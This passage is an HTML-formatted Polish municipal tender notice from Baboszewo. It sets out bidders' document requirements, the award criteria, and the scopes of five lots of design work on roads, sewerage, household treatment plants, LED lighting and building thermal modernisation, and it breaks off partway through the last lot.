<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wzór umowy zaakceptowany przez Wykonawcę.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Termin wykonania - 5</li>
</ul>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ugbaboszewo.bip.org.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Baboszewo, 09-130 Baboszewo, ul. Warszawska 9 A (pokój Nr 31).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.04.2015 godzina 11:00, miejsce: Urząd Gminy Baboszewo, 09-130 Baboszewo, ul. Warszawska 9 A, Pokój Nr 4 SEKRETARIAT.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Wykonanie dokumentacji projektowych przebudowy dróg gminnych i ulic w Baboszewie..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 1 - Wykonanie dokumentacji projektowych przebudowy dróg gminnych:
1. Projekt przebudowy drogi gminnej Nr 300186W -   w miejscowości Śródborze o długości  ok. 892 m,
2. Projekt przebudowy drogi gminnej  Nr 300131W  - w miejscowości Lutomierzyn o długości ok. 1770 m, 
3. Projekt przebudowy drogi gminnej Nr 300118W Korzybie, Brzeście, Kowale - w miejscowości Zbyszyno              
    o długości  ok. 750 mb. 
4. Projekt przebudowy drogi gminnej Nr 301114W  Bożewo - granice gminy  o długości  ok. 750 mb.
5. Projekt przebudowy drogi gminnej Nr 300124 W  Mystkowo-Cywiny Wojskie o dł.  ok 2340 m
6. Projekt przebudowy drogi gminnej Nr 300125W Cywiny Wojskie - Bożewo  ok.2900 m 
7. Projekt przebudowy drogi gminnej Nr 300121W Zbyszyno -Brzeście o dł. ok.4820m

1.W zakres zamówienia wchodzi opracowanie dokumentacji projektowej na wykonanie następujących robót: roboty przygotowawcze, roboty ziemne, zjazdy, podbudowa drogi, nawierzchnia z mieszanek mineralno-asfaltowych, roboty wykończeniowe, oznakowanie (projekt stałej organizacji ruchu).
a) opracowanie dokumentacji projektowej (projekt budowlany i wykonawczy) - 4 egz.	
b) kosztorys inwestorski   - 1 egz.
c) przedmiar robót - 1 egz.
d)  specyfikacje techniczne wykonania i odbioru robót - 4 egz.
e) informacja dotycząca bezpieczeństwa i ochrony zdrowia (BIOZ) - 4 egz.)
2.Oprócz wersji papierowej całość dokumentacji ma być dostarczona na nośniku elektronicznym, wersja cyfrowa musi zawierać te same elementy co dokumentacja w formie papierowej. Rysunki, uzgodnienia i inne dokumenty należy zapisać w formacie pdf. Przedmiary należy dodatkowo zapisać z uniwersalnym rozszerzeniem (.ath).
3.Uzyskanie warunków technicznych, uzgodnień, opinii i decyzji niezbędnych do  wykonania projektu.
4.Zamawiający dysponuje i przekaże Wykonawcy (po podpisaniu umowy)   aktualne mapy do celów projektowych 
    a)przebudowy drogi gminnej Nr 300186W -   w miejscowości Śródborze,
    b)przebudowy drogi gminnej  Nr 300131W  - w miejscowości Lutomierzyn

Zadanie 2-   Wykonanie dokumentacji projektowych przebudowy ulic w Baboszewie:
1. Projekt przebudowy ulicy Akacjowej o długości  ok. 145 m,   
2. Projekt przebudowy ulicy Zacisze o długości  ok. 221 m,
3. Projekt przebudowy ulicy Jaśminowej o długości  ok. 112 m,
4. Projekt przebudowy ulicy Topolowej o długości  ok. 227,5 m,
5. Projekt przebudowy ulicy Kwiatowej o długości  ok. 367 m,
6. Projekt przebudowy ulicy Wrzosowej o długości  ok. 116,5 m,
7. Projekt przebudowy ulicy Polnej o długości  ok. 980 m,

1.W zakres zamówienia wchodzi opracowanie dokumentacji projektowej na wykonanie następujących robót: roboty przygotowawcze, roboty ziemne, krawężniki i obrzeża, chodniki (oprócz ulicy Polnej), zjazdy, podbudowa drogi, nawierzchnia z mieszanek mineralno-asfaltowych (na ulicach Jaśminowej, Akacjowej, Wrzosowej,  dopuszcza się zaprojektowanie nawierzchni z kostki brukowej), roboty wykończeniowe, oznakowanie (projekt stałej organizacji ruchu, zawierający elementy bezpieczeństwa ruchu).
1) opracowanie dokumentacji projektowej  (projekt budowlany i wykonawczy)- 4 egz.
     w tym:	
a) kosztorys inwestorski   - 1 egz.
b) przedmiar robót - 1 egz.
c)  specyfikacje techniczne wykonania i odbioru robót - 4 egz.
d)  informacja dotycząca bezpieczeństwa i ochrony zdrowia (BIOZ) - 4 egz.)
2)Oprócz wersji papierowej całość dokumentacji ma być dostarczona na nośniku elektronicznym, wersja cyfrowa musi zawierać te same elementy co dokumentacja w formie papierowej. Rysunki, uzgodnienia i inne dokumenty należy zapisać w formacie pdf. Przedmiary należy dodatkowo zapisać z uniwersalnym rozszerzeniem (.ath).

2. Uzyskanie warunków technicznych, uzgodnień, opinii i decyzji niezbędnych do  wykonania projektu, między innymi:
1)  wykonanie  projektu przepustów w miejscu skrzyżowania rowu z projektowanymi drogami. Uzgodnienia                     z Wojewódzkim Zarządem Melioracji i Urządzeń Wodnych  w Warszawie Oddział  w Ciechanowie w zakresie kolizji             z urządzeniami melioracyjnymi
2) dokonanie uzgodnień z wykonawcą projektu na budowę wodociągu i kanalizacji sanitarnej z przyłączami  oraz kanalizacji deszczowej w miejscowości Baboszewo w ul. Zielonej i ulicach sąsiednich (część II zamówienia),                    w zakresie  określenia poziomów  i spadków ulic zapewniających prawidłowe funkcjonowania kanalizacji deszczowej, osadzenia studzienek kanalizacyjnych itp.
3)Zamawiający dysponuje i przekaże Wykonawcy (po podpisaniu umowy)  aktualną mapę do celów projektowych 
   przebudowy ulicy Polnej  w Baboszewie (Zadanie 2 pkt 7).


TERMIN WYKONANIA DOKUMENTACJI PROJEKTOWEJ  -  60 dni od podpisania umowy. 
Jako termin wykonania dokumentacji projektowej, będzie uznany dzień, w którym Wykonawca złoży w imieniu Zamawiającego:
1)wniosek o pozwolenie na budowę wraz z kompletną dokumentacją projektową na przebudowę:
a)drogi gminnej Nr 300124 W  Mystkowo-Cywiny Wojskie (zadanie 1 pkt 5)
b)drogi gminnej Nr 300125W Cywiny Wojskie - Bożewo  ok.2900 m (zadanie 1 pkt 6)
c) ulicy Akacjowej o długości  ok. 145 m,  (zadanie 2 pkt.1) 
d) ulicy Zacisze o długości  ok. 221 m, (zadanie 2 pkt 2)
e) ulicy Jaśminowej o długości  ok. 112 m (zadanie 2 pkt 3)
f)  ulicy Topolowej o długości  ok. 227,5 m, (zadanie 2 pkt 4)
g) ulicy Kwiatowej o długości  ok. 367 m, (zadanie 2 pkt 5)
h) ulicy Wrzosowej o długości  ok. 116,5 m, (zadanie 2 pkt 6)

 2) zgłoszenie zamiaru wykonania robót budowlanych wraz z kompletną dokumentacją projektową na przebudowę dróg i ulic:
a) drogi gminnej Nr 300186W -   w miejscowości Śródborze (zadanie 1 pkt 1)
b) drogi gminnej  Nr 300131W  - w miejscowości Lutomierzyn (zadanie 1 pkt 2)
c) drogi gminnej Nr 300118W Korzybie, Brzeście, Kowale - w miejscowości Zbyszyno (zadanie 1  pkt3)            
d) drogi gminnej Nr 301114W  Bożewo - granice gminy (zadanie 1 pkt 4)
e) ulicy Polnej w Baboszewie  (zadanie 2 pkt 7)

3) Jako termin wykonania dokumentacji projektowej  na przebudowę drogi gminnej Nr 300121W Zbyszyno - Brzeście Nowe (zadanie 1 pkt 7), będzie uznany dzień złożenia opracowanej, kompletnej dokumentacji projektowej w siedzibie Zamawiającego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 71.22.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin wykonania - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Wykonanie dokumentacji projektowej budowy  wodociągu z przyłączami  i kanalizacji sanitarnej z przyłączami oraz kanalizacji deszczowej   w miejscowości Baboszewo..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Założenia do projektowania (przewidywane długości uzbrojenia):
1) Wodociąg: ok.1300m w 4 ulicach:  (Akacjowa, Zacisze, Jaśminowa, Kwiatowa), ok. 45 przyłączy do posesji.
2) Kanalizacja sanitarna: ok. 2300 m w 6 ulicach (Akacjowa, Zacisze, Jaśminowa, Topolowa, Kwiatowa, Wrzosowa), ok. 45 przyłączy do posesji,
3) Kanalizacja deszczowa: ok. 500 m w 5 ulicach (Akacjowa, Zacisze, Jaśminowa, Topolowa, Kwiatowa)

2.Zakres rzeczowy obejmuje:
1) Uzyskanie warunków technicznych, uzgodnień, opinii i decyzji niezbędnych do  wykonania projektu  w tym między innymi uzgodnienia z Wojewódzkim Zarządem Melioracji i Urządzeń Wodnych  w Warszawie Oddział                        w Ciechanowie w zakresie kolizji z urządzeniami melioracyjnymi:
      a)uzyskanie warunków podłączenia kanalizacji deszczowej w 3 ulicach do rowu melioracyjnego .	
      b) wykonanie operatu wodno-prawnego na włączenie wód opadowych do rowu oraz operatu na budowę urządzeń 
         dla wprowadzenia wód opadowych do rowu. 
     c) wykonanie projektu przykrycie odcinka rowu melioracyjnego.
 2) Dokonanie uzgodnień z wykonawcą projektu na budowę ulic w Baboszewie (część I zadanie 2 pkt 1-6 zamówienia),w zakresie  określenia poziomów  i spadków ulic zapewniających prawidłowe funkcjonowania kanalizacji deszczowej, osadzenia studzienek kanalizacyjnych itp.
3) Analiza możliwości odbioru dodatkowej ilości ścieków sanitarnych przez istniejące urządzenia kanalizacyjne oraz zaprojektowanie rozwiązania zapewniającego prawidłową pracę urządzeń kanalizacyjnych zaprojektowanych                         i istniejących.
4) uzyskanie zgody od właścicieli nieruchomości na realizację planowanego przedsięwzięcia w formie pisemnego oświadczenia,  po uprzednim ustaleniu przebiegu przyłącza kanalizacyjnego   i przyłącza wodociągowego na mapie do celów projektowych.
5) opracowanie  po podpisaniu umowy projektu koncepcyjnego (do zatwierdzenia przez Zamawiającego) - 1 egz.
6) opracowanie dokumentacji projektowej:
a)  projekt budowlany i wykonawczy - 4 egz.	
b) kosztorys inwestorski   - 1 egz.
c) przedmiar robót - 1 egz.
d)  specyfikacje techniczne wykonania i odbioru robót - 4 egz.
e) informacja dotycząca bezpieczeństwa i ochrony zdrowia (BIOZ)- 4 egz.)
7) oprócz wersji papierowej całość dokumentacji ma być dostarczona na nośniku elektronicznym, wersja cyfrowa musi zawierać te same elementy co dokumentacja w formie papierowej. Rysunki, uzgodnienia i inne dokumenty należy zapisać w formacie pdf. Przedmiary należy dodatkowo zapisać z uniwersalnym rozszerzeniem (.ath).
8) Wykonawca zobowiązany jest do uzyskania oświadczeń właścicieli nieruchomości o zapoznaniu się z przebiegiem trasy sieci i zgodą na udostępnienie terenu na czas budowy sieci, na podstawie których Wójt Gminy Baboszewo złoży oświadczenie o posiadanym prawie do dysponowania nieruchomością na cele budowlane , zgodnie z art. 33 ust. 2 pkt 2 ustawy z dnia 7 lipca 1994 roku - Prawo budowlane (t.j. Dz.U. z 2010 r., Nr 243, poz. 1623 ze zm.). 
9) Zamawiający zaleca wykonanie projektu kanalizacji sanitarnej z grawitacyjnym odprowadzenie ścieków. Zamawiający dopuszcza zastosowanie przydomowych  (indywidualnych) pompowni ścieków  tylko w sytuacji, gdy ze względu na lokalizację nie można zastosować odpływu grawitacyjnego. 
10)Zamawiający dysponuje i przekaże Wykonawcy (po podpisaniu umowy):
  - aktualną mapę do celów projektowych budowy wodociągu i kanalizacji sanitarnej z przyłączami i kanalizacji 
    deszczowej.
  - wypis i wyrys z miejscowego planu zagospodarowania przestrzennego gminy Baboszewo dla działek objętych 
    projektowaniem.

TERMIN WYKONANIA - 30 dni od podpisania umowy. Jako termin wykonania zamówienia, będzie uznany dzień, w którym Wykonawca złoży w imieniu Zamawiającego wniosek o pozwolenie na budowę wraz z kompletną dokumentacją projektową..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 71.22.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin wykonania - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Wykonanie dokumentacji projektowej budowy 112 przydomowych oczyszczalni ścieków zlokalizowanych na terenie gminy Baboszewo - III etap..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Szczegółowy zakres opracowania  obejmuje:
a) opracowanie 112 projektów budowlanych  przydomowych oczyszczalni ścieków o wydajności do 7,5 m3 na dobę -    zgodnie z przepisami  prawa budowlanego  i  spełniającego wymagania Rozporządzenia Ministra Infrastruktury  z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i form dokumentacji projektowej, specyfikacji technicznych wykonania i obioru robót oraz programu funkcjonalno-użytkowego (tj.Dz. U. z 2013 r. poz.1129) wraz z opisami i rysunkami niezbędnymi do realizacji robót  oraz wrysowanie każdej projektowanej oczyszczalni na mapie sytuacyjno- wysokościowej  ( nie jest wymagana aktualna mapa geodezyjna do celów projektowych)- w liczbie 4 egzemplarzy  w  formie pisemnej  na każdy obiekt  + 1 egz. w formie elektronicznej  na każdy obiekt:
b)  opracowanie specyfikacji technicznej wykonania i odbioru robót budowlanych, przez którą należy rozumieć opracowanie zawierające zbiory wymagań w zakresie sposobu wykonania robót budowlanych, obejmujące w szczególności wymagania właściwości materiałów, wymagania dotyczące sposobu wykonania i oceny prawidłowości wykonania poszczególnych robót oraz zakres prac, które powinny być ujęte w cenach poszczególnych pozycji przedmiarów - w liczbie 4 egzemplarzy na każdy obiekt            + 1 egz. w wersji elektronicznej.
c) opracowanie przedmiarów robót odrębnie dla każdej przydomowej oczyszczalni ścieków, przez które należy rozumieć opracowanie zawierające opis robót budowlanych, w kolejności technologicznej ich wykonania, z podaniem  liczby jednostek przedmiarowych robót, wynikających z dokumentacji projektowej oraz podstaw do ustalenia cen jednostkowych robót lub nakładów rzeczowych - w liczbie 4 egzemplarze  na każdy obiekt + 1 egz. w wersji elektronicznej.
d) opracowanie kosztorysu inwestorskiego z odrębnym wyszczególnieniem kosztów wykonania każdej  przydomowej oczyszczalni ścieków, oraz  zbiorczego kosztu wykonania wszystkich zaprojektowanych oczyszczalni ścieków.

2.  Wykonawca dokumentacji projektowej budowy przydomowych oczyszczalni ścieków  jest zobowiązany do:
a) zapoznanie się z dokumentami będącymi w posiadaniu Zamawiającego  (szczegółowy wykaz właścicieli posesji zapisanych na przydomowe  oczyszczalnie ścieków)
b) szczegółowego sprawdzenie w terenie warunków wykonania zamówienia oraz uzyskanie  od właściciela posesji pisemnej akceptacji zaprojektowanej lokalizacji oczyszczalni. 
c) konsultacji z Zamawiającym (na każdym etapie projektowania)    istotnych rozwiązań technologicznych, konstrukcyjnych i materiałowych mających wpływ na koszty budowy przydomowych oczyszczalni ścieków.                                                                              d) pobrania ze Starostwa Powiatowego w Płońsku Wydział Geodezji, Katastru i Gospodarki Nieruchomościami mapek sytuacyjno-wysokościowych dot. działek,  na których będą budowane oczyszczalnie ścieków.
e) opisywania proponowanych materiałów za pomocą parametrów technicznych, tzn. bez podawania  nazw własnych,  producentów  lub pochodzenia.
f) wykonania projektu  zgodnie  z zasadami współczesnej wiedzy technicznej, obowiązującymi przepisami oraz normami i normatywami  z zastosowaniem w projekcie rozwiązań standardowych skutkujących optymalizacją  kosztów.
Zaprojektowane rozwiązania techniczne powinny gwarantować taki stopień oczyszczania, żeby ścieki mieściły się w zakresie parametrów, o których mowa w rozporządzeniu Ministra Środowiska z dnia 8 lipca 2004 r.  w sprawie warunków, jakie należy spełnić przy wprowadzaniu ścieków do wód lub do ziemi, oraz w   sprawie substancji   szczególnie szkodliwych dla środowiska wodnego   (Dz.U. Nr 168, poz. 1763). 
Wszystkie elementy oczyszczalni muszą posiadać odpowiednią wytrzymałość mechaniczną dostosowaną do zagłębienia pod powierzchnią terenu. Zamawiający wymaga, aby zaprojektowane zbiorniki były wykonane z tworzywa odpornego na udar np.  z potrójną ścianką.  Oczyszczalnie nie mogą być projektowane na głębokości większej niż dopuszcza to producent urządzeń. W szczególnie uzasadnionych przypadkach, gdy zachodzi konieczność zwiększonego zagłębienia oczyszczalni, projekt powinien przewidywać sposób wzmocnienia ich wytrzymałości mechanicznej. 
Każdorazowo projektant musi uwzględniać potrzeby przyszłych użytkowników, możliwości lokalizacyjne oraz lokalne warunki gruntowo-wodne.
g) Zamawiający  na etapie wyceny kosztów wykonania dokumentacji projektowej  nie określa  technologii   oczyszczania ścieków.  Proponowane rozwiązania  przez projektanta muszą uzyskać akceptację Zamawiającego.
h) Zamawiający zastrzega, że ilość zleconych do wykonania projektów może być zwiększona lub zmniejszona nie więcej jak                     o 10%   ogólnej liczby oczyszczalni  ścieków określonej w  załączonej tabeli (str.24 SIWZ).TERMIN WYKONANIA DOKUMENTACJI PROJEKTOWEJ - 60 dni od podpisania umowy. Jako termin wykonania dokumentacji projektowej , będzie uznany dzień, w którym Wykonawca złoży w imieniu Zamawiającego zgłoszenie zamiaru wykonywania robót budowlanych wraz z kompletną dokumentacją projektową..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 71.22.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin wykonania - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Wykonanie dokumentacji  projektowych  budowy oświetlenia LED z linią elektroenergetyczną kablową..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 1  -  Projekt budowy oświetlenia LED z linią elektroenergetyczną kablową, w układzie gwiaździstym  o dł. ok. 2570 m  w miejscowości Dziektarzewo, w układzie liniowym przy drodze Dziektarzewo -Goszczyce Poświętne - ok. 1190 m, w układzie liniowym przy drodze Dziektarzewo -Rybitwy ok. 450 m.
Zadanie 2 -  Projekt budowy oświetlenia LED z linią elektroenergetyczną kablową, w układzie liniowym  o dł. ok. 1400 m  w miejscowości Wola Dłużniewska.
Zadanie 3  - Projekt budowy oświetlenia LED z linią elektroenergetyczną kablową  w Baboszewie  na ul. Akacjowej - ok. 135 m,   Wrzosowej- ok.110 m, Zielonej -  ok.500 m,  Jaśminowej - ok. 110 m, Kwiatowej -180 m, Zacisze  - ok. 150 m, Grobickiego - ok. 180 m, Mazowieckiej  ok. 220 m., Glinojeckiej ok. 100 m 

Zakres rzeczowy obejmuje:
1) Uzyskanie warunków technicznych, uzgodnień , opinii i decyzji niezbędnych do  wykonania projektu. 
   Zamawiający dysponuje i przekaże Wykonawcy (po podpisaniu umowy)  aktualną mapę do celów projektowych 
   budowy oświetlenia z linią elektroenergetyczną kablową na zadanie 3:  ul. Akacjowa, Wrzosowa, Jaśminowa, 
   Kwiatowa.
2) Opracowanie dokumentacji projektowej - 4 egz.	
a) kosztorys inwestorski   - 1 egz.
b) przedmiar robót - 1 egz.
c)  specyfikacje techniczne wykonania i odbioru robót - 4 egz.
d) informacja dotycząca bezpieczeństwa i ochrony zdrowia (BIOZ) - 4 egz.)
3) Oprócz wersji papierowej całość dokumentacji ma być dostarczona na nośniku elektronicznym, wersja cyfrowa musi zawierać te same elementy co dokumentacja w formie papierowej. Rysunki, uzgodnienia i inne dokumenty należy zapisać w formacie pdf. Przedmiary należy dodatkowo zapisać z uniwersalnym rozszerzeniem (.ath).
TERMIN WYKONANIA DOKUMENTACJI PROJEKTOWEJ - 90 dni od podpisania umowy. 
Jako termin wykonania dokumentacji projektowej, będzie uznany dzień, w którym Wykonawca złoży w imieniu Zamawiającego wniosek o pozwolenie na budowę wraz z kompletnymi dokumentacjami projektowymi..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 71.22.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 90.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin wykonania - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Wykonanie dokumentacji  projektowych budowy, remontów i termomodernizacji budynków. 

Zadanie 1  -   Wykonanie dokumentacji  projektowych termomodernizacji budynków..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1)Szkoła Podstawowa w Baboszewie - 3 kondygnacje.
Wymiary budynku:  (szer. 19 m  ; dł. 30 m  , wys.12,50 m) + (szer. 9,70 dł. 18,90, wys. 12,50)  - (minus ściana wspólna o szer. 12,50 m, wys. 11,0 m) - (minus ściana wspólna z Gimnazjum  o szer. 16,40 wys.  11,0 m ) 
 Do wykonania:
-  projekt wykonawczy,  w tym rysunki elewacji, 
-  przedmiar robót  - 1 egz.
- kosztorys inwestorski (ocieplenie, elewacja, rynny, rury spustowe, parapety obróbki blacharskie)  1 egz.
- specyfikacja techniczna wykonania i odbioru robót + BIOZ  - 2 egz.
- charakterystyka energetyczna budynku - 1 egz. 

2) Szkoła Podstawowa w Mystkowie - dwie kondygnacje.  
Wymiary budynku:   szer.  11   m ; dł.  55  m , wys. różne:  sala gimnastyczna  6,75 m;   łącznik 4,60  m,   budynek główny ok. 7,00  m  (minus wspólna ściana z budynkiem  nowo dobudowanym   szer.  13 m ,  wys. 5,90)
  Do wykonania:
- projekt wykonawczy, w tym rysunki elewacji - 4 egz.
- przedmiar robót - 1 egz.
- kosztorys inwestorski (ocieplenie, elewacja, rynny, rury spustowe, parapety obróbki blacharskie, wymiana stolarki    okiennej drewnianej na PCV; (13 okien 176 cm x 162 cm; 3 okna 174cm x 145cm; 2 okna 116cmx85cm; 1 okno 85  cm 57 cm) - 1 egz.
- specyfikacje techniczne wykonania i odbioru robót + BIOZ - 2 egz.
- charakterystyka energetyczna budynku - 1 egz. 
            
3)Budynek socjalny w Śródborzu - dwie kondygnacje.
    Wymiary budynku:  szer. 16 m; dł. 16,30 m, wys.  8 m     
      Do wykonania:
    - szczegółowa inwentaryzacja budynku:   zewnętrzna (elewacje)  i wewnętrzna - 2 egz. 
    - projekt wykonawczy - 4 egz.
    - przedmiar robót - 1 egz.
    - kosztorys inwestorski (ocieplenie, elewacja - tynk sylikatowy na warstwie zaprawy klejowej zbrojonej 
      siatką,  pasy rynnowe, rynny, rury spustowe, parapety zewnętrzne, obróbki  blacharskie, wymiana  
      drewnianych drzwi zewnętrznych na aluminiowe)  - 1 egz.
   -  specyfikacje techniczne wykonania i odbioru robót + BIOZ  - 2 egz.
    - charakterystyka energetyczna budynku -  1 egz.

4) Stacja uzdatniania wody w Cieszkowie Nowym - budynek parterowy
     Wymiary budynku : (szer. 12,80 m  ; dł. 20,30 m, wys. 4,60 m) + ( szer. 9,20 m , dł. 9,50, wys. 3,35)                
     - (minus ściana wspólna o szer. 9,20 m, wys. 3,85  m)  
      Do wykonania:
     -  projekt wykonawczy, w tym rysunki elewacji  - 4 egz.
     - przedmiar robót 1 egz.
